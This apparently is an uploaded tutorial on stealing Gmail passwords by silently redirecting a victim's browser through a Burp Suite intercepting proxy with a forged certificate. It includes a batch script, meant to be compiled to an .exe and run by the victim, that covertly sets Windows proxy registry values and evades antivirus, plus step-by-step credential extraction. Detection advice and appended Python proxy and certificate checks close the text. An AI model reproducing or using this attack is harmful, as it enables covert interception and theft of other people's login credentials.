Hacking Gmail passwords

Upload: gy-tien

Post on 17-Jul-2015


Gmail password hacking technique

In this article I present a technique for hacking the password of Gmail, or of other websites that authenticate in a similar way (SSL certificate, HTTPS). Since your own Gmail password may be exposed in this way, the article also shows how to recognize and prevent this risk.

I. General background

- Gmail and other web services usually use HTTPS to encrypt the packet carrying the user/pass. When the web browser encrypts with the certificate that Gmail provides, the user/pass packet is safe (almost absolutely) while it travels over the network.
- So where is the gap that makes it possible to hack passwords protected by authentication and encryption methods with such a high level of security?

The normal authentication process when a user accesses Gmail:

Step 1: The user accesses gmail.com.
Step 2: Gmail sends information to Verisign to obtain a certificate.
Step 3: Verisign sends Gmail the certificate, which includes a public key and a private key.
Step 4: Gmail sends the public key to the user, to be used to encrypt the authentication information.
Step 5: The user encrypts with the public key and sends the result to Gmail.
Step 6: Gmail uses the private key to decrypt.

*Note: the user/pass packet that the user sends to Gmail is encrypted with the public key, so only the private key can decrypt it. The private key is kept by Gmail and is never sent over the network, so this packet is extremely secure and cannot be decrypted.

The certificate forgery technique

The user's connection to Gmail does not go directly to Gmail. It passes through an intercepting proxy, and the certificate is forged.

Step 1: The user goes to Gmail.
Step 2: When the user's packet reaches the intercepting proxy, the proxy modifies the information and sends it on to Gmail.
Step 3: Gmail sends a request to Verisign to generate a certificate.
Step 4: Verisign sends the certificate back to Gmail. Gmail keeps the private key and sends the public key to the requester.
Step 5: Gmail sends the public key to the intercepting proxy. This key is not passed on to the user.
Step 6: The intercepting proxy generates a key pair of its own and sends its public key to the user.
Step 7: The user encrypts the user/pass with this fake public key generated by the proxy and sends it to the proxy. Because the proxy generated the key pair itself, it has the private key needed to decrypt.
Step 8: After decrypting the packet sent by the user, the proxy encrypts it with the public key that Gmail sent and forwards it to Gmail, so the authentication still completes.

*Note: if an attacker controls the intercepting proxy, the attacker can learn the user's user/pass in full. A user who does not notice that the connection passes through an intercepting proxy can have the user/pass exposed, even though very secure authentication methods are in use.

II. Tools used

- Burpsuite_v1.3. Download link: http://www.portswigger.net/suite/burpsuite_v1.3.zip. This is a tool that functions as an intercepting proxy.
- Java (Burpsuite is a .jar file that runs on Java). Download link: http://sun.com
- IE, Firefox
- A tool that sets the proxy with a single file. This is a tool I wrote myself as a .bat file; you can also convert the .bat file to an .exe file. When the user clicks this file, it sets the proxy automatically.
- Quick_Batch_File_Compiler_3.21, a tool that converts a .bat file to an .exe file.

III. Technique for obtaining the Gmail password

- The most common way is to use a keylogger, but this cannot be used when strong antivirus programs are present.
- Export the information from a web browser such as IE or Firefox. This does not work when the user has not saved the user/pass in the browser.
- Another way is to forge the certificate and use an intercepting proxy.

a. Setting the proxy for the user

For everything the user accesses on the web to pass through the intercepting proxy, the proxy has to be set in the user's browser. Ways to set it:
- Set it by hand (having somehow obtained control of the victim's computer).
- Get the user to run a file.exe that we wrote to set the proxy.

********
Create a file.bat with the content:
echo Windows Registry Editor Version 5.00 > 1
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings] >2
echo "MigrateProxy"=dword:00000001 > 3
echo "ProxyEnable"=dword:00000001 > 4
echo "ProxyHttp1.1"=dword:00000000 > 5
echo "ProxyServer"="IP:port" > 6
echo "ProxyOverride"="" > 7
copy /b "1"+"2"+"3"+"4"+"5"+"6"+"7" b.reg
del 1 /f /q
del 2 /f /q
del 3 /f /q
del 4 /f /q
del 5 /f /q
del 6 /f /q
del 7 /f /q
regedit.exe /s b.reg
del b.reg /f /q
********

Then use the Quick_Batch_File_Compiler_3.21 tool to convert this file.bat to file.exe. When the user clicks this file, it automatically sets the proxy for IE; replace IP with the IP you need to set, and Port with the port the proxy uses. What is very convenient is that no antivirus program treats this file as a virus. In this article I use a single computer, so the proxy I set in the browser is 127.0.0.1.

b. Procedure

Step 1: Install Java
Step 2: Run Burpsuite
Step 3: Set the proxy
Step 4: Access Gmail
Step 5: Go to the proxy and view the user/pass information

Step 1: Install Java


After downloading the Java installer from sun.com, install it to prepare the environment for programs that run on Java.

Step 2: Run Burpsuite

After downloading Burpsuite, extract the archive and stop when you reach the .jar file. Run Burpsuite_v1.3 as the intercepting proxy by double-clicking the .jar file extracted from the download.

Running the Burpsuite program

By default this program acts as a proxy only for the machine it runs on. For other machines to be able to use it as a proxy, go to the Proxy tab and choose Options; there you can Edit the port in use (the default is 8080) and clear the "loopback only" check box.

Switch to the Intercept tab to configure the operating mode of the intercepting proxy.

"Intercept on" mode: this is the active mode. If someone sets this computer as their proxy, all of their Internet access is controlled by the proxy. When a request from the browser reaches the proxy, the proxy presents its content, which can be edited, and the request reaches the web server only once it is forwarded.

We turn this mode off by clicking "Intercept on", which changes it to "off". The purpose is that a user who has this software as their proxy can still reach the Internet normally. In this mode the proxy only records the information from the user's web access.


Step 3: Set the proxy

In IE, set the proxy to address 127.0.0.1, port 8080: IE -> IE options -> Connections tab -> click the LAN Settings button. Alternatively, run the file.bat with the content shown above. Using the tool to convert file.bat to file.exe and then running that file.exe also works.

Step 4: Go to Gmail through IE (with the proxy set)

On accessing Gmail you will see a certificate error notice; click Continue to proceed.

Google continues to report a Certificate Error; you still type the username and password to get into the mail.

I am able to get into the mail, and the Certificate Error notice is still displayed.

Step 5: Go to the proxy and find the username and password

Go to Burpsuite -> switch to the Target tab -> choose Site Map -> select the site https://www.google.com -> open Accounts -> open ServiceLoginAuth -> on the right-hand side choose Request (the information sent to the server) -> open Raw, where we will see the username and password.

IV. Detecting the attack and securing the Gmail account

To hack a Gmail password, the attacker has to get the user to set a proxy so that traffic passes through an intercepting proxy, and then forge the certificate. So to detect this and secure your Gmail account, you can do the following:

1. Detect whether your network access goes through a proxy

Before going on the Internet, open the proxy settings and check whether any address has been set. This check is very useful, but it is somewhat tedious and hard to keep up, and is easily forgotten or skipped.

2. Detect a forged certificate

a. When access is normal
+ Going to Gmail does not bring up pop-ups proposing that you download a certificate.
+ Clicking the padlock icon -> View Certificate shows that the certificate was issued by Verisign.

b. When access passes through an intercepting proxy
+ Going to Gmail brings up a window reporting that the certificate has an error and asking whether to continue. A user who sees this icon is advised not to continue, and to re-check the safety of the network and the computer before accessing the site.

+ If the user continues to the Gmail page, there is no padlock icon; a Certificate Error icon appears in its place.
+ Viewing this certificate shows that it was not issued by Verisign.
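The issuer check from 2a and 2b can also be scripted. The following is an added example, not part of the original article: it reads the issuer from the dictionary that Python's `ssl.getpeercert()` returns and compares it with the CA the site is expected to use. The function names, the `EXPECTED` set and both sample certificates are constructed for illustration.

```python
import socket
import ssl

def issuer_org(cert):
    """Return the issuer organizationName from an ssl.getpeercert() dict."""
    for rdn in cert.get("issuer", ()):
        for key, value in rdn:
            if key == "organizationName":
                return value
    return None

def classify(cert, expected_orgs):
    """Compare the issuer with the CA names this site is expected to use."""
    org = issuer_org(cert)
    if org in expected_orgs:
        return f"ok: issued by {org}"
    return f"suspicious: issued by {org}, expected one of {sorted(expected_orgs)}"

def check_host(host, expected_orgs, port=443, timeout=5):
    """Live check. A validation failure is the same signal as the browser's
    certificate error page; a valid chain is still compared by issuer, which
    catches a proxy whose CA was added to the local trust store."""
    context = ssl.create_default_context()
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            with context.wrap_socket(sock, server_hostname=host) as tls:
                return classify(tls.getpeercert(), expected_orgs)
    except ssl.SSLCertVerificationError as exc:
        return f"suspicious: validation failed ({exc.verify_message})"

# Constructed samples in the shape getpeercert() returns (not captured data).
EXPECTED = {"VeriSign, Inc."}  # assumption: the CA the article names
GENUINE = {"issuer": ((("countryName", "US"),),
                      (("organizationName", "VeriSign, Inc."),))}
PROXIED = {"issuer": ((("organizationName", "Example Intercepting Proxy"),),
                      (("commonName", "Example Proxy CA"),))}

if __name__ == "__main__":
    print(classify(GENUINE, EXPECTED))
    print(classify(PROXIED, EXPECTED))
```

`check_host` needs network access; pass it the issuer names you have recorded for the site from a trusted network.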

Note: a user who sees these two signs is advised not to continue to Gmail, because the username and password can be lost. In addition, users should not save passwords for automatic login: if the computer falls into someone else's hands, the information stored in IE or Firefox can easily be exploited. Users should also install antivirus programs to block viruses and keyloggers that steal passwords.
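Check 1 in section IV is easy to forget when done by hand, so it can be automated. The following is an added example, not part of the original article: it audits the output of `reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"` for the `ProxyEnable` and `ProxyServer` values and reports any enabled proxy that is not on an approved list. The function names, the approved list and the sample outputs are constructed for illustration.

```python
import re

# One value line of `reg query` output: indented name, type, then data.
VALUE_LINE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s*(.*)$")

def parse_reg_query(text):
    """Map value names to data; REG_DWORD data such as 0x1 becomes an int."""
    values = {}
    for line in text.splitlines():
        match = VALUE_LINE.match(line)
        if not match:
            continue
        name, kind, data = match.group(1), match.group(2), match.group(3).strip()
        values[name] = int(data, 16) if kind == "REG_DWORD" and data else data
    return values

def proxy_endpoints(server):
    """Split 'host:port' or 'http=h:p;https=h:p' into bare host:port strings."""
    return [part.split("=", 1)[-1].strip()
            for part in server.split(";") if part.strip()]

def audit_proxy(text, approved=frozenset()):
    """Return one finding per enabled proxy endpoint that is not approved."""
    values = parse_reg_query(text)
    if values.get("ProxyEnable", 0) != 1:
        return []
    return [f"unapproved proxy in use: {endpoint}"
            for endpoint in proxy_endpoints(values.get("ProxyServer", ""))
            if endpoint not in approved]

# Constructed sample outputs (not captured from a real machine).
TAMPERED = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
    MigrateProxy    REG_DWORD    0x1
    ProxyEnable    REG_DWORD    0x1
    ProxyServer    REG_SZ    127.0.0.1:8080
    ProxyOverride    REG_SZ
"""
CLEAN = TAMPERED.replace("ProxyEnable    REG_DWORD    0x1",
                         "ProxyEnable    REG_DWORD    0x0")
PER_PROTOCOL = TAMPERED.replace("127.0.0.1:8080",
                                "http=10.0.0.5:3128;https=198.51.100.7:8080")

if __name__ == "__main__":
    for finding in audit_proxy(TAMPERED):
        print(finding)
```

Run on a schedule or at logon with the organisation's real proxy in `approved`, this turns the manual check into an alert whenever the setting changes.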